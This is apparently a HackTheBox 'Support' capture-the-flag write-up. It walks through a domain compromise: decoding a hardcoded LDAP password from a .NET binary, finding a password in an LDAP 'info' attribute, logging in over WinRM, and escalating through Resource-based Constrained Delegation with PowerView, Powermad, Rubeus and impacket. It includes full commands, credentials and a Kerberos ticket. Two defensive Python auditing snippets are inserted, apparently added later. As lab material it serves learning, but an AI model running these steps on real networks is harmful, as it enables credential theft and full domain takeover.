HackTheBox – Support Write-up

Hi everyone! This machine is an Active Directory machine where we enumerate an SMB shared folder, use dnSpy to reverse engineer a .NET binary and recover LDAP credentials, run an LDAP query to find another user's credentials, gain initial access via WinRM, and escalate privileges using Kerberos Resource-based Constrained Delegation. Let's get started!

Nmap enumeration

$ IP=10.10.11.174
$ sudo nmap -sC -sV -p- 10.10.11.174
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-02 06:48:58Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49682/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
52169/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -2s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-08-02T06:49:57
|_  start_date: N/A

SMB enumeration

Readable shared folder

$ smbmap -H $IP -u anonymous
[+] Guest session       IP: 10.10.11.174:445   Name: 10.10.11.174                                    
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        support-tools                                           READ ONLY       support staff tools
        SYSVOL                                                  NO ACCESS       Logon server share
$ smbclient \\\\$IP\\support-tools
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022

                4026367 blocks of size 4096. 884023 blocks available
smb: \> get UserInfo.exe.zip

Since the available software is listed with version numbers, a quick Google search turns up a possible privilege escalation vector using 7-Zip. UserInfo.exe.zip also stood out, as there is no official software called UserInfo; this binary might contain user credentials.

dnSpy obtaining credentials

While loading it into IDA Freeware, I noticed that the binary is a .NET file, so analyzing it with dnSpy is more suitable.

I decided to check out the LdapQuery class since, during enumeration, I found that credentials are required for LDAP queries. Since the software performs LDAP queries, it might contain hardcoded credentials for them.


I decided to write a Python script to obtain the plaintext password.

import base64

# Base64-encoded password and XOR key recovered from the LdapQuery class
# of UserInfo.exe with dnSpy.
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = "armando".encode("UTF-8")

array = base64.b64decode(enc_password)
array2 = ""

# Reverse the binary's obfuscation: each byte is XORed with the repeating
# key and then with the constant 223.
for i in range(len(array)):
    array2 += chr(array[i] ^ key[i % len(key)] ^ 223)

print(array2)
PS C:\Users\lamecarrot\Desktop> py .\support_htb_crack.py
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

LDAP query

With the newly found credentials, we can perform LDAP queries. While going through the list of users, I noticed an interesting user, also called support.

$ ldapsearch -v -x -b "DC=support,DC=htb" -H "ldap://$IP" "(objectclass=*)" "sAMAccountName" -D "support\\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' | grep sAMAccountName
...
# requesting: sAMAccountName 
sAMAccountName: Administrator
sAMAccountName: Guest
sAMAccountName: Administrators
sAMAccountName: Users
sAMAccountName: Guests
...
sAMAccountName: ldap
sAMAccountName: support
sAMAccountName: smith.rosario
sAMAccountName: hernandez.stanley
sAMAccountName: wilson.shelby
sAMAccountName: anderson.damian
sAMAccountName: thomas.raphael
sAMAccountName: levine.leopoldo
sAMAccountName: raven.clifton
sAMAccountName: bardot.mary
sAMAccountName: cromwell.gerard
sAMAccountName: monroe.david
sAMAccountName: west.laura
sAMAccountName: langley.lucy
sAMAccountName: daughtler.mabel
sAMAccountName: stoll.rachelle
sAMAccountName: ford.victoria
sAMAccountName: MANAGEMENT$

I decided to look into support's account information and found an interesting attribute called "info".

$ ldapsearch -v -x -b "CN=support,CN=Users,DC=support,DC=htb" -H "ldap://$IP" "(objectclass=*)" -D "support\\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
...

# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20220528111201.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
...
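Finding a password in the support user's info attribute is worth turning into a routine check. The following Python, an added example rather than code from the write-up, parses ldapsearch LDIF output (folded lines and base64 "::" values included) and flags free-text attributes such as info and description that contain keywords or password-looking values. The sample LDIF is constructed; only the attribute names and the support user's info value come from the output above.

```python
import base64
import re

# Constructed sample in the shape of the ldapsearch output above: attribute
# names as on the box, values made up except the support user's info field.
# Entry 2 holds a password in "info", entry 3 a base64-encoded ("::") one.
SAMPLE_LDIF = (
    "# ldap, Users, support.htb\n"
    "dn: CN=ldap,CN=Users,DC=support,DC=htb\n"
    "sAMAccountName: ldap\n"
    "description: LDAP service account\n"
    "\n"
    "# support, Users, support.htb\n"
    "dn: CN=support,CN=Users,DC=support,DC=htb\n"
    "sAMAccountName: support\n"
    "info: Ironside47pleasure40Watchful\n"
    "\n"
    "# smith.rosario, Users, support.htb\n"
    "dn: CN=smith.rosario,CN=Users,DC=support,DC=htb\n"
    "sAMAccountName: smith.rosario\n"
    "info:: " + base64.b64encode(b"Password: Summer2022!").decode() + "\n"
)

SUSPECT_ATTRS = ("info", "description", "comment")  # free-text fields
KEYWORD = re.compile(r"(?i)\b(pass(word|wd)?|pwd|cred)\b")
PASSWORDISH = re.compile(r"^(?=.*[a-z])(?=.*[A-Z0-9])\S{8,}$")  # 8+ mixed chars
ATTR_LINE = re.compile(r"^([\w.;-]+)(::?) ?(.*)$")


def parse_ldif(text: str):
    """Parse LDIF into a list of {attr_lower: [values]} dicts, handling
    comment lines, folded continuation lines and base64 ("::") values."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:  # folded line joins the previous one
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, cur = [], {}
    for line in lines + [""]:  # trailing "" flushes the last entry
        if not line.strip():
            if cur:
                entries.append(cur)
            cur = {}
            continue
        m = ATTR_LINE.match(line)
        if line.startswith("#") or not m:
            continue
        attr, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        cur.setdefault(attr.lower(), []).append(value)
    return entries


def find_exposed_secrets(entries):
    """Return (dn, attribute, value) for every suspicious free-text value."""
    hits = []
    for entry in entries:
        dn = entry.get("dn", ["<no dn>"])[0]
        for attr in SUSPECT_ATTRS:
            for value in entry.get(attr, []):
                if KEYWORD.search(value) or PASSWORDISH.match(value):
                    hits.append((dn, attr, value))
    return hits


if __name__ == "__main__":
    for dn, attr, value in find_exposed_secrets(parse_ldif(SAMPLE_LDIF)):
        print("%s: %s = %r" % (dn, attr, value))
```

Against a real domain, feed it the output of an ldapsearch over the whole Users container (as in the first query above) and review every hit by hand, since the heuristic is deliberately loose.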

Initial access

Winrm

Looking at the open ports, we can see that port 5985 is open, which is WinRM. We can use evil-winrm to log in with the credential we just found.

$ sudo gem install evil-winrm
$ evil-winrm -i $IP -u "support" -p 'Ironside47pleasure40Watchful'
...
*Evil-WinRM* PS C:\Users\support\Documents> 

Giving it a try, I was able to log in and obtain a shell.

User.txt

*Evil-WinRM* PS C:\Users\support\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> dir


    Directory: C:\Users\support\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         9/12/2022   9:30 PM             34 user.txt


*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
7a******************************
*Evil-WinRM* PS C:\Users\support\Desktop> 

Privilege escalation

Kerberos Resource-based Constrained Delegation

First, we need to download two PowerShell scripts. Copy, paste and execute the commands below on your attacking machine.

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1

Upload them via evil-winrm and import them as modules.

upload PowerView.ps1
Import-Module .\PowerView.ps1
upload Powermad.ps1
Import-Module .\Powermad.ps1

We can check whether users are allowed to create new computer objects in the domain. By default, a domain member can add up to 10 computers to the domain.

*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainObject -Identity "dc=support,dc=htb" -Domain support.htb

Next, we have to check that the domain controller is running at least Windows Server 2012.

*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainController

The victim machine is a Windows Server 2022.

Finally, we have to check that the target computer does not already have the msds-allowedtoactonbehalfofotheridentity attribute set.

*Evil-WinRM* PS C:\Users\support\Desktop> hostname
dc
*Evil-WinRM* PS C:\Users\support\Desktop> Get-NetComputer dc | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity
name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC

Create a new computer object

We can now create a new computer object. Paste the following into PowerShell to create the object and note its SID.

New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Get-DomainComputer fake01 -Properties objectsid

Let's create a new raw security descriptor granting the "fake01" computer principal delegation rights. Remember to change the SID to the value you have just found, as well as the hostname passed to Get-DomainComputer.

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5101)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
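A defender reading msds-allowedtoactonbehalfofotheridentity back over LDAP gets the raw self-relative security descriptor, not the SDDL string. The following Python is an added example, not code from the write-up: it encodes a descriptor with the same shape as the one built above (owner BA, one access-allowed ACE carrying the full-control mask for the given SID) and decodes any such descriptor back into the SIDs it authorises, which is what a periodic sweep of computer objects needs in order to spot an unexpected principal such as fake01$. The byte layout follows MS-DTYP; the function names are my own.

```python
import struct

# Rights string used on this page, CCDCLCSWRPWPDTLOCRSDRCWDWO, as an access
# mask: full control over an AD object.
FULL_CONTROL_MASK = 0x000F01FF
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
BUILTIN_ADMINS = "S-1-5-32-544"  # the "BA" owner in O:BAD:(...)


def sid_to_bytes(sid: str) -> bytes:
    """Encode an S-1-5-... string as a binary SID (MS-DTYP 2.4.2.2)."""
    _, rev, auth, *subs = sid.split("-")
    return (struct.pack("<BB", int(rev), len(subs))
            + int(auth).to_bytes(6, "big")
            + b"".join(struct.pack("<I", int(s)) for s in subs))


def sid_from_bytes(buf: bytes, off: int) -> str:
    """Decode the binary SID that starts at offset off."""
    rev, count = struct.unpack_from("<BB", buf, off)
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, auth) + "".join("-%d" % s for s in subs)


def build_rbcd_sd(allowed_sids) -> bytes:
    """Self-relative descriptor equivalent to O:BAD:(A;;<full>;;;SID)...,
    the shape the PowerShell above writes into the attribute."""
    owner = sid_to_bytes(BUILTIN_ADMINS)
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        # ACE: type, flags, size (4 header + 4 mask + SID), mask, then SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0,
                            8 + len(sid_b), FULL_CONTROL_MASK) + sid_b
    # ACL header: revision 2, sbz1, AclSize, AceCount, sbz2
    dacl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    # SD header (20 bytes): revision 1, sbz1, control, OffsetOwner,
    # OffsetGroup, OffsetSacl, OffsetDacl; owner follows the header, then DACL
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         20, 0, 0, 20 + len(owner))
    return header + owner + dacl


def allowed_principals(sd: bytes):
    """Return [(sid, mask)] for every access-allowed ACE in the DACL. Offsets
    come from the header, so any self-relative descriptor read from LDAP
    can be passed in, not only ones produced by build_rbcd_sd."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    off, found = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            found.append((sid_from_bytes(sd, off + 8), mask))
        off += ace_size
    return found


if __name__ == "__main__":
    # Constructed from the SID shown on this page; in a real audit the bytes
    # come from the computer object's attribute.
    sd = build_rbcd_sd(["S-1-5-21-1677581083-3380853377-188903654-5101"])
    for sid, mask in allowed_principals(sd):
        print("%s may act on behalf of other identities (mask 0x%X)" % (sid, mask))
```

Any computer object whose decoded list names a principal nobody provisioned for delegation, or a DC with the attribute set at all, is the signal to investigate; clearing the attribute removes the delegation path.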

Impersonate to get a ticket

Download Rubeus.exe to your attacking machine.

$ wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe

Upload it to the victim's machine via evil-winrm and generate an RC4 hash of the new computer account's password.

*Evil-WinRM* PS C:\Users\support\Desktop> upload Rubeus.exe
*Evil-WinRM* PS C:\Users\support\Desktop> .\Rubeus.exe hash /password:123456 /user:fake01 /domain:support.htb
...
[*] Action: Calculate Password Hash(es)

[*] Input password             : 123456
[*] Input username             : fake01
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBfake01
[*]       rc4_hmac             : 32ED87BDB5FDC5E9CBA88547376818D4
[*]       aes128_cts_hmac_sha1 : 3E1A2E5F7675F6BA5C21FDEABFD92B93
[*]       aes256_cts_hmac_sha1 : 37CD1332C1F8DC0C4AA0B738CC971DEBD8D66AED50AF2AF2EC63B7459344B834
[*]       des_cbc_md5          : E0795B98AEA1A16B

We can now request a Kerberos ticket as fake01$ while impersonating the administrator. Remember to change the RC4 hash, username and domain name to your own values.

*Evil-WinRM* PS C:\Users\support\Desktop> .\Rubeus.exe s4u /user:fake01$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt
...
[*] Action: S4U

[*] Using rc4_hmac hash: 32ED87BDB5FDC5E9CBA88547376818D4
[*] Building AS-REQ (w/ preauth) for: 'support.htb\fake01$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):



[*] Action: S4U

[*] Building S4U2self request for: 'fake01$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'fake01$@SUPPORT.HTB'
[*] base64(ticket.kirbi):


[*] Impersonating user 'administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':


Let's write the final ticket to a file on the victim's machine instead: the psexec step from the blog post I followed won't work here, since we would be connecting back to the same machine. Once written, we download the ticket to our attacking machine.

*Evil-WinRM* PS C:\Users\support\Desktop> [IO.File]::WriteAllBytes("C:\Users\support\Documents\ticket.kirbi", [Convert]::FromBase64String("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"))
*Evil-WinRM* PS C:\Users\support\Desktop> download ticket.kirbi

Make the ticket usable and use it

On our Kali box, install an older version of impacket, as the latest has issues with some of the tools, along with klist (from krb5-user) and pyasn1. We also need ticket_converter.py. Copy and paste the following on your attacking machine.

wget https://raw.githubusercontent.com/zer1t0/ticket_converter/master/ticket_converter.py
pip3 install impacket==0.9.24
pip3 install pyasn1
sudo apt update
sudo apt install krb5-user

Next, destroy any existing tickets on your attacking machine, convert the ticket into a Linux-usable ccache, and point KRB5CCNAME at the new ticket.

kdestroy
python3 ticket_converter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache

We must add entries to our hosts file mapping the domain name and hostname to the victim's IP address. The service ticket was issued for cifs/dc.support.htb, so connecting by IP address instead will not work.

$ sudo nano /etc/hosts

127.0.0.1       localhost
127.0.1.1       kali

10.10.11.174 dc.support.htb support.htb

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Finally, we can use the ticket to get a shell on the victim's machine.

$ impacket-wmiexec support.htb/administrator@dc.support.htb -no-pass -k

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>

root.txt

C:\>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 955A-5CBB

 Directory of C:\Users\Administrator\Desktop

05/28/2022  04:17 AM    <DIR>          .
05/28/2022  04:11 AM    <DIR>          ..
09/12/2022  09:30 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,884,412,928 bytes free

C:\Users\Administrator\Desktop>type root.txt
f2******************************

C:\Users\Administrator\Desktop>

I hope these tabs have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂
